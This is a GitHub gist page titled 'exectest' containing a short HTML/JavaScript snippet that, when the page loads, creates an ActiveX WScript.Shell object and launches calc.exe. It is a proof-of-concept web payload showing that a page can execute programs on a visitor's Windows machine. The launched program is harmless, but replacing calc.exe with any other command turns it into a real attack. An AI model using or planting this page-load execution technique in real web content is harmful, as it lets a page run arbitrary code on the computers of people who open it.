Skip to content

Instantly share code, notes, and snippets.

@xsuperbug
Last active May 15, 2020 13:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xsuperbug/700fe2adc9f9476958670108e5d834e8 to your computer and use it in GitHub Desktop.
Save xsuperbug/700fe2adc9f9476958670108e5d834e8 to your computer and use it in GitHub Desktop.
exectest
<script language="javascript" type="text/javascript">
function OpenFile(){
alert ('Work');
var x = new ActiveXObject("WScript.Shell");
x.run('calc.exe');
}
</script>
</head>
<body onload="OpenFile()">
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment